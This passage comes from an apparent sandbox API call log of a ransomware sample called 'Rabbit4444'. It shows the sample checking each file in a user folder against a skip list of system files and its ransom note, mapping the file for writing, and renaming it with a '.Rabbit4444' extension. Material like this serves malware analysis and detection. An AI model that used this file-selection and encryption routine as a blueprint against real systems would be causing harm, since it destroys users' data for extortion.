(lpString=".ini") returned 4 [0068.183] lstrcmpiW (lpString1="DCC}", lpString2=".ini") returned 1 [0068.183] lstrlenW (lpString=".sys") returned 4 [0068.183] lstrcmpiW (lpString1="DCC}", lpString2=".sys") returned 1 [0068.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a3ec8c71-cfee-485c-97c8-8cb142566dcc}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.183] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.183] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15949392155) returned 1 [0068.183] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.183] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0068.183] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0068.183] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.184] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.185] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.186] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15949650795) returned 1 [0068.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0068.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0068.186] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.186] CloseHandle (hObject=0x29c) returned 1 [0068.186] CloseHandle (hObject=0x280) returned 1 [0068.186] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}.Rabbit4444") returned 156 [0068.186] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a3ec8c71-cfee-485c-97c8-8cb142566dcc}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a3ec8c71-cfee-485c-97c8-8cb142566dcc}.rabbit4444"), dwFlags=0x1) returned 1 [0068.187] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0a4a79, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a0a4a79, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c6174b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A41AF181-37C6-4951-830B-E343DFC21B27}", cAlternateFileName="{A41AF~1")) returned 1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="Rabbit4444.exe") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2=".") returned 1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="..") returned 1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="windows") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="bootmgr") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="pagefile.sys") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="boot") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="ids.txt") returned -1 [0068.187] lstrcmpiW (lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}", lpString2="NTUSER.DAT") returned -1 [0068.187] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A41AF181-37C6-4951-830B-E343DFC21B27}" | out: lpString1="{A41AF181-37C6-4951-830B-E343DFC21B27}") returned="{A41AF181-37C6-4951-830B-E343DFC21B27}" [0068.187] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A41AF181-37C6-4951-830B-E343DFC21B27}", dwFileAttributes=0x0) returned 1 [0068.187] lstrlenW (lpString="{A41AF181-37C6-4951-830B-E343DFC21B27}") returned 38 [0068.187] lstrlenW (lpString="Rabbit4444") returned 10 [0068.188] lstrcmpiW (lpString1="3DFC21B27}", lpString2="Rabbit4444") returned -1 [0068.188] lstrlenW (lpString=".dll") returned 4 [0068.188] lstrcmpiW (lpString1="B27}", lpString2=".dll") returned 1 [0068.188] lstrlenW (lpString=".lnk") returned 4 [0068.188] lstrcmpiW (lpString1="B27}", lpString2=".lnk") returned 1 [0068.188] lstrlenW (lpString=".ini") returned 4 [0068.188] lstrcmpiW (lpString1="B27}", lpString2=".ini") returned 1 [0068.188] lstrlenW (lpString=".sys") returned 4 [0068.188] lstrcmpiW (lpString1="B27}", lpString2=".sys") returned 1 [0068.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A41AF181-37C6-4951-830B-E343DFC21B27}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a41af181-37c6-4951-830b-e343dfc21b27}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.188] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.188] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15950040376) returned 1 [0068.190] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.190] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0068.190] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.191] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.192] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.192] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15950322705) returned 1 [0068.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0068.193] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.193] CloseHandle (hObject=0x29c) returned 1 [0068.193] CloseHandle (hObject=0x280) returned 1 [0068.193] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A41AF181-37C6-4951-830B-E343DFC21B27}.Rabbit4444") returned 156 [0068.193] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A41AF181-37C6-4951-830B-E343DFC21B27}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a41af181-37c6-4951-830b-e343dfc21b27}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A41AF181-37C6-4951-830B-E343DFC21B27}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a41af181-37c6-4951-830b-e343dfc21b27}.rabbit4444"), dwFlags=0x1) returned 1 [0068.194] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc2a5ed, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9cc2a5ed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c603cb, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", cAlternateFileName="{A5B52~1")) returned 1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="Rabbit4444.exe") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2=".") returned 1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="..") returned 1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="windows") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="bootmgr") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="pagefile.sys") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="boot") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="ids.txt") returned -1 [0068.194] lstrcmpiW (lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", lpString2="NTUSER.DAT") returned -1 [0068.194] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}" | out: lpString1="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}") returned="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}" [0068.194] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A5B5274B-2050-4F1C-8323-BFC5145BAB10}", dwFileAttributes=0x0) returned 1 [0068.195] lstrlenW (lpString="{A5B5274B-2050-4F1C-8323-BFC5145BAB10}") returned 38 [0068.195] lstrlenW (lpString="Rabbit4444") returned 10 [0068.195] lstrcmpiW (lpString1="5145BAB10}", lpString2="Rabbit4444") returned -1 [0068.195] lstrlenW (lpString=".dll") returned 4 [0068.195] lstrcmpiW (lpString1="B10}", lpString2=".dll") returned 1 [0068.195] lstrlenW (lpString=".lnk") returned 4 [0068.195] lstrcmpiW (lpString1="B10}", lpString2=".lnk") returned 1 [0068.195] lstrlenW (lpString=".ini") returned 4 [0068.195] lstrcmpiW (lpString1="B10}", lpString2=".ini") returned 1 [0068.195] lstrlenW (lpString=".sys") returned 4 [0068.195] lstrcmpiW (lpString1="B10}", lpString2=".sys") returned 1 [0068.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A5B5274B-2050-4F1C-8323-BFC5145BAB10}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a5b5274b-2050-4f1c-8323-bfc5145bab10}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.196] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.196] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15950632062) returned 1 [0068.196] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.196] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0068.196] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.288] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.290] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15960045182) returned 1 [0068.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0068.290] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.290] CloseHandle (hObject=0x29c) returned 1 [0068.290] CloseHandle (hObject=0x280) returned 1 [0068.290] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A5B5274B-2050-4F1C-8323-BFC5145BAB10}.Rabbit4444") returned 156 [0068.290] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A5B5274B-2050-4F1C-8323-BFC5145BAB10}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a5b5274b-2050-4f1c-8323-bfc5145bab10}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A5B5274B-2050-4F1C-8323-BFC5145BAB10}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a5b5274b-2050-4f1c-8323-bfc5145bab10}.rabbit4444"), dwFlags=0x1) returned 1 [0068.292] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b12eff3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b12eff3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c66567, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", cAlternateFileName="{A60A8~1")) returned 1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="Rabbit4444.exe") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2=".") returned 1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="..") returned 1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="windows") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="bootmgr") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="pagefile.sys") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="boot") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="ids.txt") returned -1 [0068.292] lstrcmpiW (lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", lpString2="NTUSER.DAT") returned -1 [0068.292] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}" | out: lpString1="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}") returned="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}" [0068.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}", dwFileAttributes=0x0) returned 1 [0068.292] lstrlenW (lpString="{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}") returned 38 [0068.292] lstrlenW (lpString="Rabbit4444") returned 10 [0068.292] lstrcmpiW (lpString1="827E0FA7C}", lpString2="Rabbit4444") returned -1 [0068.293] lstrlenW (lpString=".dll") returned 4 [0068.293] lstrcmpiW (lpString1="A7C}", lpString2=".dll") returned 1 [0068.293] lstrlenW (lpString=".lnk") returned 4 [0068.293] lstrcmpiW (lpString1="A7C}", lpString2=".lnk") returned 1 [0068.293] lstrlenW (lpString=".ini") returned 4 [0068.293] lstrcmpiW (lpString1="A7C}", lpString2=".ini") returned 1 [0068.293] lstrlenW (lpString=".sys") returned 4 [0068.293] lstrcmpiW (lpString1="A7C}", lpString2=".sys") returned 1 [0068.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a60a84f5-d627-49a9-a1e6-f2c827e0fa7c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.293] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.293] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15960416612) returned 1 [0068.293] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.294] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.295] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.296] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.296] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15960680162) returned 1 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.296] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.296] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.296] CloseHandle (hObject=0x29c) returned 1 [0068.296] CloseHandle (hObject=0x280) returned 1 [0068.296] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}.Rabbit4444") returned 156 [0068.296] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a60a84f5-d627-49a9-a1e6-f2c827e0fa7c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A60A84F5-D627-49A9-A1E6-F2C827E0FA7C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a60a84f5-d627-49a9-a1e6-f2c827e0fa7c}.rabbit4444"), dwFlags=0x1) returned 1 [0068.297] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x381e50b0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381e50b0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44fdc101, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", cAlternateFileName="{A75F2~1")) returned 1 [0068.297] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.297] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.297] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2="Rabbit4444.exe") returned -1 [0068.297] lstrcmpiW (lpString1="{A75F28ED-CBC6-4878-A664-EDD6CA16BC9D}", lpString2=".") returned 1 [0068.297] lstrcmpiW 